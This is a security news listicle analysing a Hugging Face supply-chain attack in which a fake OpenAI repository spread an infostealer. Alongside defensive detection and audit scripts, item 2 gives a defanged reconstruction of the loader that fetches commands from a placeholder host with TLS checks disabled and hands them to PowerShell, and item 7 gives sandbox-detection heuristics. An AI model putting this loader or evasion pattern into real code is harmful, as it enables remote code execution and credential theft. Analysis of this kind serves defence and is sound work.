10 Critical Lessons from the Hugging Face Supply Chain Attack That Mimicked OpenAI

In a stark reminder of the growing risks in the AI supply chain, a malicious repository on Hugging Face disguised as an official OpenAI release racked up 244,000 downloads before being taken down. The incident, detailed by security firm HiddenLayer, involved a fake Open-OSS/privacy-filter repository that delivered credential-stealing malware to Windows systems. This listicle unpacks the key takeaways from the attack, offering actionable insights for enterprises and developers relying on public AI model repositories.

1. The Attack at a Glance: A Perfectly Executed Impersonation

The malicious repository Open-OSS/privacy-filter copied OpenAI's legitimate Privacy Filter release, including its model card almost verbatim. Within 18 hours it reached the #1 trending spot on Hugging Face, buoyed by 667 likes and 244,000 downloads; researchers believe both figures were artificially inflated. The only red flag was the README, which instructed users to run start.bat on Windows or python loader.py on Linux/macOS. That single deviation from the original was all it took: running the script kicked off a full infostealer infection chain.

2. How the Malware Reached Windows Systems

The infection chain began with a loader.py script that acted as a decoy, executing legitimate-looking AI model code before unleashing malicious payloads. It disabled SSL verification, decoded a base64 URL pointing to a public JSON hosting service (jsonkeeper.com), and retrieved remote instructions. These commands were then passed to PowerShell, which downloaded a batch file from an attacker-owned domain. The batch file established persistence by creating a scheduled task masquerading as a Microsoft Edge update.
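To make that chain concrete, below is a defanged, hypothetical reconstruction of the loader pattern described here, not the actual malware: the URL is a placeholder, the function names (fetch_instructions, hand_to_powershell) are invented for illustration, and nothing executes at import time.

```python
# Defanged, hypothetical reconstruction of the described loader pattern.
# The URL and all names are placeholders, not the campaign's real code.
import base64
import json
import ssl
import subprocess
import urllib.request

# A base64-encoded URL hides the C2 endpoint from casual inspection.
ENCODED_C2 = base64.b64encode(b"https://example.invalid/config.json").decode()

def fetch_instructions(encoded_url: str) -> dict:
    """Decode the hidden URL and fetch remote instructions without TLS checks."""
    url = base64.b64decode(encoded_url).decode()
    ctx = ssl.create_default_context()
    ctx.check_hostname = False       # TLS verification disabled,
    ctx.verify_mode = ssl.CERT_NONE  # as reported for the observed loader
    with urllib.request.urlopen(url, context=ctx) as resp:
        return json.loads(resp.read())

def hand_to_powershell(command: str) -> None:
    """The observed chain piped fetched commands to PowerShell on Windows."""
    subprocess.run(["powershell", "-NoProfile", "-Command", command], check=False)
```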

3. The Loader Script: Decoy and Deception

According to HiddenLayer, the loader.py script first ran benign decoy code that mimicked a legitimate AI model loader, enough to fool even experienced developers skimming the source. Only after the decoy ran did the hidden infection chain activate, a sequencing that exploits the trust developers place in public code and model repositories. The script's ability to pair plausible decoy behavior with deferred malicious execution shows how sophisticated AI supply-chain attacks have become.
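A first pass at catching this pattern does not need to be sophisticated. The sketch below uses assumed heuristics of my own choosing, not HiddenLayer's tooling: flag any "model loader" that combines base64 decoding, disabled TLS checks, and a shell hand-off.

```python
# Static triage sketch using assumed heuristics (not HiddenLayer's tooling):
# flag loader scripts that combine base64 decoding, disabled TLS verification,
# and shell execution, however benign the surrounding code looks.
import re
from pathlib import Path

INDICATORS = {
    "base64 decode": r"base64\.b64decode",
    "TLS disabled": r"CERT_NONE|check_hostname\s*=\s*False|verify\s*=\s*False",
    "shell hand-off": r"subprocess\.(run|Popen|call)|os\.system",
}

def triage(path: str) -> list[str]:
    """Return the names of indicators found in the given script."""
    text = Path(path).read_text(errors="ignore")
    return [name for name, pat in INDICATORS.items() if re.search(pat, text)]

# Example usage: two or more hits on a "model loader" warrant manual review.
# print(triage("loader.py"))
```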

4. Command-and-Control via Static Hosting

The attackers used jsonkeeper.com, a free JSON hosting service, as their command-and-control (C2) channel. By encoding the C2 URL in base64 and disabling SSL verification, they made detection harder. More importantly, using a public hosting service allowed them to rotate payloads dynamically without modifying the repository itself. This technique is a growing trend in malware campaigns, as it provides attackers with a low-cost, low-risk way to update malicious instructions while evading repository scanners.
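Because a free JSON host is not inherently malicious, domain blocklists rarely catch this; an explicit egress allowlist is the more dependable control. A minimal sketch, assuming a policy where legitimate model-loading hosts are enumerated up front (the allowlist contents are an example, not a recommendation):

```python
# Egress-allowlist sketch: decode a base64-encoded URL found in a suspect
# script and check its host against an assumed allowlist policy.
import base64
from urllib.parse import urlparse

ALLOWED_HOSTS = {"huggingface.co", "cdn-lfs.huggingface.co"}  # example policy

def check_encoded_url(encoded: str) -> tuple[str, bool]:
    """Decode a hidden URL and report whether its host is allowlisted."""
    url = base64.b64decode(encoded).decode("utf-8", errors="replace")
    host = (urlparse(url).hostname or "").lower()
    return url, host in ALLOWED_HOSTS

sample = base64.b64encode(b"https://jsonkeeper.com/payload.json").decode()
url, allowed = check_encoded_url(sample)
print(url, "-> allowed" if allowed else "-> blocked")  # -> blocked
```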

5. Persistence Through Fake Microsoft Edge Updates

Once the initial payload was downloaded, the malware established persistence by creating a scheduled task named to resemble a legitimate Microsoft Edge update process. This trick allowed the malware to survive reboots and remain active in the background. The scheduled task was designed to blend into the system, making it difficult for average users or even some security tools to spot. Persistence through system-level tasks is a common strategy for infostealers, as it ensures long-term access to sensitive data.
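Defenders can hunt for this kind of persistence directly. The Windows-only sketch below is an assumed heuristic, and it depends on English-locale schtasks column names: flag any scheduled task that mentions Edge in its name but whose action runs from outside Microsoft's usual paths.

```python
# Windows-only persistence-hunting sketch (assumed heuristic; column names
# depend on English-locale schtasks output): flag tasks that mention Edge
# in the name but whose command lives outside Microsoft paths.
import csv
import io
import subprocess

def suspicious_edge_tasks() -> list[dict]:
    out = subprocess.run(
        ["schtasks", "/query", "/fo", "csv", "/v"],
        capture_output=True, text=True, check=True,
    ).stdout
    hits = []
    for row in csv.DictReader(io.StringIO(out)):
        name = row.get("TaskName", "") or ""
        action = row.get("Task To Run", "") or ""
        if "edge" in name.lower() and "microsoft" not in action.lower():
            hits.append({"task": name, "action": action})
    return hits
```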

6. What the Infostealer Targeted

The Rust-based infostealer deployed by the campaign was highly specific in its data theft. It targeted credentials and sessions stored in Chromium- and Firefox-based browsers, Discord local storage files, cryptocurrency wallet data, and FileZilla configurations. It also harvested host system information, such as usernames, machine names, and installed software, to potentially enable further attacks. This combination of targets suggests the attackers were after both financial assets (crypto wallets) and access credentials for enterprise systems.
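One practical response is to audit what a stealer with this target list would actually find on a given workstation. The sketch below assumes common Windows default paths, which vary by install; wallet locations differ per wallet and are omitted.

```python
# Exposure-audit sketch: check which of the reported target locations exist
# on this machine. Paths are common Windows defaults and may differ locally.
import os
from pathlib import Path

APPDATA = Path(os.environ.get("APPDATA", ""))
LOCALAPPDATA = Path(os.environ.get("LOCALAPPDATA", ""))

TARGETS = {
    "Chromium credentials": LOCALAPPDATA / "Google/Chrome/User Data/Default/Login Data",
    "Firefox profiles": APPDATA / "Mozilla/Firefox/Profiles",
    "Discord local storage": APPDATA / "discord/Local Storage/leveldb",
    "FileZilla configuration": APPDATA / "FileZilla",
}

for label, path in TARGETS.items():
    status = "present" if path.exists() else "absent"
    print(f"{label:24} {status:8} {path}")
```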

7. Anti-Analysis and Evasion Techniques

The malware incorporated advanced evasion techniques to avoid detection by security researchers and automated sandboxes. It attempted to disable the Windows Antimalware Scan Interface (AMSI) and Event Tracing for Windows (ETW), two core Windows security and telemetry features. It also checked for sandbox and virtual-machine environments, halting execution when it detected one. This anti-analysis behavior is a hallmark of modern malware and suggests the attackers invested significant resources in keeping the campaign stealthy.
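To illustrate the kind of check involved, the sketch below implements generic hypervisor-marker heuristics. These are assumptions about the technique class, not the campaign's actual logic.

```python
# Illustrative VM-detection heuristics of the kind described; assumed generic
# checks, not the campaign's actual logic.
import platform
import subprocess

VM_MARKERS = ("vmware", "virtualbox", "vbox", "qemu", "kvm", "hyper-v", "xen")

def looks_like_vm() -> bool:
    probes = [platform.platform().lower()]
    try:
        # Windows: the BIOS manufacturer often names the hypervisor (wmic is
        # deprecated on recent builds, so a failure simply means "no signal").
        probes.append(subprocess.run(
            ["wmic", "bios", "get", "manufacturer"],
            capture_output=True, text=True, timeout=5,
        ).stdout.lower())
    except (OSError, subprocess.TimeoutExpired):
        pass
    return any(marker in probe for probe in probes for marker in VM_MARKERS)

print("VM indicators found" if looks_like_vm() else "no obvious VM indicators")
```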

8. AI Supply Chain Risks: A Growing Concern

This incident underscores that public AI model registries are a genuine software supply-chain risk. When developers pull models directly into corporate environments, any code bundled with those models runs with access to source code, cloud credentials, and internal systems. Unlike mature package ecosystems, AI model repositories often lack rigorous vetting: HiddenLayer previously found malicious code hidden inside Pickle-serialized files on Hugging Face that bypassed the platform's scanners. Enterprises should treat AI model downloads with the same scrutiny as third-party software packages.
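Pickle is dangerous because deserialization can trigger arbitrary imports and calls. The sketch below shows the general idea behind pickle scanners, not Hugging Face's own implementation: walk the opcode stream with the standard library's pickletools and flag global references outside an allowlist, before anything is unpickled. The allowlist here is an assumed example.

```python
# Pickle triage sketch: inspect opcodes without unpickling, and flag GLOBAL/
# STACK_GLOBAL/INST references outside an allowlist. This mirrors the general
# idea behind pickle scanners; the allowlist is an assumed example.
import pickletools

SAFE_PREFIXES = ("torch", "numpy", "collections")

def risky_globals(path: str) -> list[str]:
    hits = []
    with open(path, "rb") as f:
        for opcode, arg, _pos in pickletools.genops(f):
            if opcode.name in ("GLOBAL", "STACK_GLOBAL", "INST"):
                ref = str(arg)  # STACK_GLOBAL resolves its target from the
                                # stack (arg is None), so it is flagged
                                # conservatively for manual review.
                if not ref.startswith(SAFE_PREFIXES):
                    hits.append(f"{opcode.name}: {ref}")
    return hits

# Example: a hit like "GLOBAL: os system" is an immediate red flag.
# print(risky_globals("pytorch_model.bin"))
```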

9. Hugging Face's Security Gaps and Platform Response

Despite Hugging Face's scanning efforts, the fake repository stayed live long enough to accumulate massive apparent traction. Researchers noted that the download and like counts were likely inflated by bots, making the repository appear trustworthy. Reliance on user reports and baseline malware scanning may not be sufficient against attacks that combine decoy code with external C2 channels. Hugging Face has not publicly detailed how it removed the repository, but the incident highlights the urgent need for stronger validation and real-time monitoring of trending repositories.

10. Broader Implications for the AI Community

HiddenLayer identified six additional malicious repositories beyond this one, suggesting a coordinated campaign targeting the AI ecosystem. The use of impersonation, artificial social proof, and Rust-based infostealers indicates that threat actors are increasingly adapting traditional malware techniques to the AI domain. As open-source AI models become integral to enterprise operations, the attack surface grows. The community must adopt stronger verification practices, such as checking repository authenticity through official channels, using containerized environments for model testing, and implementing runtime monitoring for unusual network requests.
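As a concrete starting point, repository authorship can be checked programmatically before anything is downloaded. Below is a minimal sketch using the huggingface_hub client; the expected org handle is an assumption that must itself be confirmed through the vendor's official channels.

```python
# Authorship-check sketch using huggingface_hub. Confirm the expected org
# handle through the vendor's official channels before trusting this check.
from huggingface_hub import HfApi

def verify_author(repo_id: str, expected_author: str) -> bool:
    """Return True only if the repo's listed author matches the expected org."""
    info = HfApi().model_info(repo_id)
    return (info.author or "").lower() == expected_author.lower()

# A lookalike such as "Open-OSS/privacy-filter" fails this check against the
# real org, whatever its download and like counts claim.
# print(verify_author("Open-OSS/privacy-filter", "openai"))
```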

The Hugging Face attack is a cautionary tale for every organization that incorporates public AI models into its workflow. By understanding the tactics used, from fake trending status to anti-analysis measures, security teams can better defend against these emerging threats. Always verify the source, scan for anomalies, and treat every third-party model as a potential risk until proven safe.
